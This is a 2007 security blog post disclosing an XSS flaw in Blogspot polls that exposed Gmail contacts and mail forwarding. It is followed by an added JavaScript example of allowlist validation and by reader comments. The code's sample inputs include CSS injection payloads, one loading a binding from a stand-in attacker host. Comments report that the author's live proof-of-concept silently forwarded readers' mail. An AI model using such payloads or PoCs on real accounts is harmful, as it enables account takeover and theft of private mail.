Yesterday I found a new Google.com XSS vulnerability that can be abused to steal information from Gmail accounts. I've done responsible disclosure of at least 3 vulns to Google, but since I haven't got enough 'motivation', I'll go full disclosure now.
The vulnerability exists in the Blogspot polls feature; I had already disclosed a vulnerability in this system. The 'font' parameter was not being sanitized before being used inside a STYLE tag, so you could inject IE's expression() and Mozilla's -moz-binding. They fixed it, but they didn't check the rest of the code closely enough. The new XSS is:
Since it's Sunday and there is nothing else to do, I've created 2 more PoCs: one of them shows your contacts, the second one makes Gmail forward all newly received emails to another email account. No user interaction is required; you just need to open a website while still logged in to Gmail.
POC1: http://beford.org/stuff/contacts.htm
POC2: http://beford.org/stuff/gmail.htm
I have tested them under IE, Konqueror, Opera and Firefox; it should work on all of them. If you want to be protected against this kind of attack, I'd highly recommend Firefox + NoScript.
Update: Google fixed this issue. I'd like to ask the people that looked at the second PoC to disable forwarding if you have not done so; I'm still getting a ton of email. This screenshot shows how to disable forwarding.
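The root cause described above is a CSS injection: a user-controlled 'font' parameter was dropped into a STYLE block without validation. The following is an added example written for this post, not the Blogspot polls code; the widget markup, the allowlist of font names and the function names are all assumptions. It shows the unsafe interpolation pattern beside an allowlist-based replacement, which is the check that would have stopped expression() and -moz-binding values from ever reaching the style sheet.

```javascript
// Added example, not Blogspot's code: validating a user-supplied "font"
// parameter before it is interpolated into a <style> block.

// Hypothetical allowlist of font families the poll widget is willing to render.
const ALLOWED_FONTS = new Set([
  "Arial", "Georgia", "Tahoma", "Times New Roman", "Trebuchet MS", "Verdana",
]);

// Return the canonical font name if the input is exactly one of the allowed
// names (after trimming surrounding whitespace), otherwise null. Allowlisting
// makes escaping unnecessary: nothing but a known name ever reaches the CSS.
function validateFont(raw) {
  if (typeof raw !== "string") return null;
  const name = raw.trim();
  return ALLOWED_FONTS.has(name) ? name : null;
}

// Vulnerable pattern, kept for comparison: the parameter goes straight into
// the style sheet, so any CSS the caller supplies (extra declarations, a
// closing tag, vendor-specific values) ends up in the document.
function unsafePollStyle(font) {
  return `<style>.poll { font-family: ${font}; }</style>`;
}

// Hardened pattern: validate, and fall back to a fixed default on failure.
function safePollStyle(font, fallback = "Verdana") {
  const name = validateFont(font) ?? fallback;
  // Quote the family name so multi-word names such as "Times New Roman" parse.
  return `<style>.poll { font-family: "${name}"; }</style>`;
}

// Constructed inputs: two legitimate values and two that carry CSS payloads
// of the kind the post mentions (IE expression(), Mozilla -moz-binding).
const SAMPLE_INPUTS = [
  "Tahoma",
  "  Times New Roman ",
  "Arial; background: expression(alert(1))",
  "x; -moz-binding: url(http://attacker.invalid/x.xml)",
];

// Report, for each constructed input, what the two patterns would emit.
function compareInputs(inputs = SAMPLE_INPUTS) {
  return inputs.map((font) => ({
    input: font,
    accepted: validateFont(font) !== null,
    unsafe: unsafePollStyle(font),
    safe: safePollStyle(font),
  }));
}

for (const row of compareInputs()) {
  console.log(row.accepted ? "accepted" : "rejected", JSON.stringify(row.input));
  console.log("  unsafe:", row.unsafe);
  console.log("  safe:  ", row.safe);
}
```

Run it with node; the two payload-carrying inputs are rejected by validateFont and the safe builder emits the default family for them, while unsafePollStyle shows the injected declarations surviving intact. The same allowlist approach applies to any parameter that lands inside CSS (colour, size, alignment): decide the set of acceptable values up front rather than trying to strip dangerous substrings.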
Ouch!
I love how you make your AJAX life easier by importing the Prototype library: dandy hacker
Comment by Giorgio Maone — September 24, 2007 @ 10:56 am
[...] because of the huge user base involved: beford decided to launch his new blog disclosing a Google Polls XSS which, thanks to the clever “widget reuse” feature that allows Google services to [...]
Pingback by hackademix.net » GoogHOle (XSS pwning GMail, Picasa and almost 200K customers) — September 24, 2007 @ 12:40 pm
[...] to Fernando from beford.org, this is the 4th vulnerability he has found so far on Google services and because it affects a huge number of [...]
Pingback by Gmail XSS exploit - Google XSS - Gmail vulnerability — September 24, 2007 @ 7:36 pm
[...] A Google Polls XSS which, thanks to the (too) smart “widget reuse” allowing Google services to integrate the same [...]
Pingback by DigitMemo.com » Multi Google Security Holes Revealed — September 24, 2007 @ 9:15 pm
[...] there is something even worse. Beford.org details another XSS vulnerability in Google that allows stealing information from Gmail accounts. The flaw lies primarily in [...]
Pingback by [SSD] Security & Development Blog » Black week for Google — September 24, 2007 @ 10:16 pm
[...] [via bedford] Link to This Post: [...]
Pingback by Google Vulnerabilities Reveal Your Gmail Contacts & Messages — September 25, 2007 @ 2:52 am
Fails with Firefox/NoScript …just FYI
Comment by pog — September 25, 2007 @ 9:33 am
[...] Multiple pieces of proof-of-concept code posted online graphically demonstrated the potential for attacks that target the weakness. One stole all contacts [...]
Pingback by Unholy trinity of flaws put Google users at risk - Computer Forums — September 25, 2007 @ 12:02 pm
[...] third issue has been disclosed at Beford.org to show how a cross-site scripting bug in Google’s Blogspot Polls could allow the hijacking [...]
Pingback by Ryan Naraine’s Zero Day mobile edition — September 25, 2007 @ 8:06 pm
[...] third issue has been disclosed at Beford.org to show how a cross-site scripting bug in Google’s Blogspot Polls could allow the hijacking of [...]
Pingback by Hackers expose holes in GMail, Blogspot, Search Appliance | xMoDx — September 25, 2007 @ 11:24 pm
[...] third issue has been disclosed at Beford.org to show how a cross-site scripting bug in Google’s Blogspot Polls could allow the hijacking of [...]
Pingback by DigitMemo.com » Hackers expose holes in GMail, Blogspot, Search Appliance — September 26, 2007 @ 12:10 am
[...] http://blog.beford.org/?p=3 http://sla.ckers.org/forum/read.php?3,16177,16262 Affected product: Blogspot and the search engine of [...]
Pingback by ·¨-=[WHK]=-¨· » Archive » Multiple vulnerabilities in Google products — September 26, 2007 @ 3:11 am
[...] different techniques for stealing Gmail users' e-mail have been discovered. Read more about the techniques here and [...]
Pingback by How Gmail users can protect their e-mail from being stolen « Webbsnack — September 26, 2007 @ 11:58 am
[...] at risk turns out to be Gmail, which has a twofold vulnerability. The first, illustrated on Fernando Beford's blog, lies in the so-called 'polls application', a part of [...]
Pingback by New vulnerabilities for Google services « APNIBI blog — September 26, 2007 @ 3:02 pm
sad that the issue is already fixed, don't see anything now
Comment by John — September 26, 2007 @ 4:03 pm
[...] hole in Google Polls makes it possible to attack other Google services, such as Search, Blogspot, [...]
Pingback by NieuwsEnzo.info » Welcome » Google Analytics, Picasa, Polls and Search Appliance have holes! — September 26, 2007 @ 5:05 pm
[...] third issue has been disclosed at Beford.org to show how a cross-site scripting bug in Google’s Blogspot Polls could allow the hijacking of [...]
Pingback by eBusiness Industry News » Blog Archive » Bullseye on Google: Hackers expose holes in GMail, Blogspot, Search Appliance — September 26, 2007 @ 6:59 pm
[...] http://blog.beford.org/?p=3 http://blogs.zdnet.com/security/?p=539 [...]
Pingback by me@myself » Google works like clockwork… — September 26, 2007 @ 9:46 pm
[...] of them, which have been compiled in this post by Kriptopolis. Perhaps the most serious is this one, since it allowed taking control of a Gmail account, and from there the [...]
Pingback by [SSD] Security & Development Blog » Collection of XSS vulnerabilities in Google applications — September 27, 2007 @ 2:41 am
[...] Three holes Earlier this week three other serious holes in Google services were already discovered. One bug made it possible to steal the e-mail and address book of GMail users. Google reportedly [...] that hole [...]
Pingback by Serious hole in Google mail service - i3D.net Game Forums — September 27, 2007 @ 4:24 am
[...] Gmail that allows forwarding e-mails meeting certain conditions to the attacker, to one related to Blogspot's polls system, which can be used to steal everything from contacts to the e-mails themselves; these are [...]
Pingback by Geekotic · Google's holes — September 27, 2007 @ 4:05 pm
[...] — given the huge number of users involved — is one discovered by researcher beford in a Google Polls XSS that allows Google services to integrate the same functionality across multiple services. [...]
Pingback by A rough week for Google security — Security Bytes — September 28, 2007 @ 12:12 am
Hi -
I think perhaps both links do the forwarding? I believe that I only clicked on the contacts link.
But it looks like this sets up forwarding on the gmail account in question to your mailbox, since my gmail account has been forwarding to you for a couple of days.
Your account is now full, and bouncing, so I suspect I’m not the only one that clicked on it, and was left with all their email forwarding to you.
Sorry about that, and, of course, please delete.
Comment by Tom — September 28, 2007 @ 8:16 pm
[...] hole (published by beford.org) was possible thanks to a crafted page opened while another tab had open [...]
Pingback by Hole in Gmail at grezlikowski.pl — September 28, 2007 @ 8:34 pm
I visited the poc page and saw nothing, but now I’m getting bounces from fernando@beford.org.
I guess I misunderstood the nature of XSS attacks - doesn't restarting the browser fix the issue?
Comment by jeff — September 28, 2007 @ 10:16 pm
Ah, I’m dumb, I had no idea POC turned on gmail forwarding. Sorry for mailbombing you Fernando, I did not fully understand your POC.. and I get a LOT of freakin email via various Linux/FreeBSD mailing lists.
Comment by jeff — September 28, 2007 @ 10:18 pm
I guess that I should have added a bigger/better explained warning, I wasn't expecting the exposure I got such as being on slashdot/cnet/theregister/etc. I've just disabled that email account.
All the code is up there, only the second poc enabled forwarding http://beford.org/stuff/
Comment by beford — September 29, 2007 @ 3:19 am
Great job, sir!
I actually played with your POC and then forgot about it… I guess I should have paid more attention!
It's amazing to know just how many of us will click a link even when we know it's bad… and it's scary just how easy it is to exploit something that most of us use.
Excellent POC, excellent job!
P.S. please disregard all the securityfocus spam and porn that I sent you… =)
Comment by bladerunner — September 29, 2007 @ 9:50 pm
[...] turns out to be timely. Two exploits against gmail have been reported in the past week (here and here), and there’s an interesting account of what you can do if someone compromises your [...]
Pingback by The Blog That Goes Ping » Blog Archive » De-Gmailing. — October 1, 2007 @ 3:41 am
XSS [...] in Google Polls
[...] Beford [...] Google Vulnerability [...] G…
Trackback by Websecurity [...] — October 1, 2007 @ 9:42 pm
[...]
Pingback by [...] :: Punisher :: — October 7, 2007 @ 8:17 pm
[...] I get help from Ymir's technical director and we discover that: "Colombian researcher Fernando Muñoz has discovered a new XSS vulnerability in Google.com that can be exploited to steal [...]
Pingback by Even the rich make mistakes « Ket! what are you doing in Congo? — November 21, 2007 @ 9:49 pm
not bad for a queer like you ;-P
regards
Comment by lithyum — November 22, 2007 @ 9:36 pm
Lithyum: Thanks, bisexual xD but this is the old bug, it was the other one you had to look at.
Comment by beford — November 23, 2007 @ 1:04 am
[...] appears that the GMail security issue is fixed, but that won’t remove any previously installed Filters from your GMail [...]
Pingback by WARNING: Google’s GMail security failure leaves my business sabotaged :: David Airey :: Graphic and Logo Designer — December 24, 2007 @ 11:00 am
Disable filtering? Wouldn’t simply reviewing your filters work to remove any evil ones? Or am I missing something?
Comment by Michael — December 26, 2007 @ 8:20 pm
Michael: There seems to be some confusion regarding this vulnerability/poc and pdp's find. This one only allowed using Gmail's built-in option to forward incoming email; pdp's find used a CSRF on Gmail to inject evil filters. According to what I read, David Airey's account was attacked by using CSRF.
To reverse my attack, you have to disable Forwarding, and for pdp’s you have to remove evil filters from your filters list.
Comment by Fernando Muñoz — December 27, 2007 @ 8:16 pm
[...] just finished reading about the Google Vulnerability which was present a few weeks go (but subsequently fixed). Basically, an unscrupulous website could [...]
Pingback by Check your Gmail filters! » thepinkc — December 28, 2007 @ 8:03 am
Okay so two different exploits. I am still confused and now concerned as well. Your post is rather unclear about what the second exploit does, how to undo it, or if Google has or hasn’t fixed the issue. Some of us would like to be able to use forwarding again on our accounts!
Comment by Michael Bierman — December 28, 2007 @ 2:46 pm
I think I have resolved my confusion. It isn’t that a user needs to disable forwarding, it is they need to remove the address your attack places in the pop/Forwarding page (unlike the previous attack which worked via filters). Correct?
Many thanks.
Michael
Comment by Michael — December 28, 2007 @ 7:06 pm
An update on the designer who lost his domain (and got it back again)
http://www.davidairey.co.uk/david-airey-domain-restored.html
Michael
Comment by Michael — December 28, 2007 @ 9:03 pm
That’s right Michael.
This is the post where pdp posted about the CSRF http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
Pdp just gave notice of the vuln on his blog, but didn't release any details until Google fixed the issue.
Comment by Fernando Muñoz — December 31, 2007 @ 5:07 pm
[...] appears that the GMail security issue is fixed, but that won’t remove any previously installed Filters from your GMail [...]
Pingback by David Airey :: Graphic and Logo Designer » WARNING: Google’s GMail security failure leaves my business sabotaged — January 17, 2008 @ 10:41 am
[...] so as not to reveal the technique (or leave incriminating evidence). Turns out it was a well documented and discussed (at least in webapp security circles) vulnerability in GMail where via CSRF an [...]
Pingback by Real-word CSRF hack | Mike Andrews — January 19, 2008 @ 6:45 am
My girlfriend just told me that she was seeing some “weird messages” on her account, and on inspection it looks like she fell foul of an exploit akin to your second POC quite some time ago – she’s only been getting messages now because the mailserver it’s trying to forward to has been failing.
I didn’t hear about this exploit when it was first found, and I’m reasonably technically-focused; my girlfriend didn’t stand a chance. I’m astonished that Google didn’t send out any kind of alert to their users when they patched the hole, because anyone who’d been exploited would still have the forwarding rule in place even after the patch.
Comment by Richard — March 25, 2008 @ 12:23 am
[...] The hacker exploited a GMail backdoor to insert a filter that forwards administrative emails to a different email address and subsequently deletes the original email. The cross-scripting vulnerability has since been fixed. [...]
Pingback by Gmail Vulnerability caused Domain loss | Domain Name News | Domain News | Expired Domains — April 23, 2008 @ 10:23 am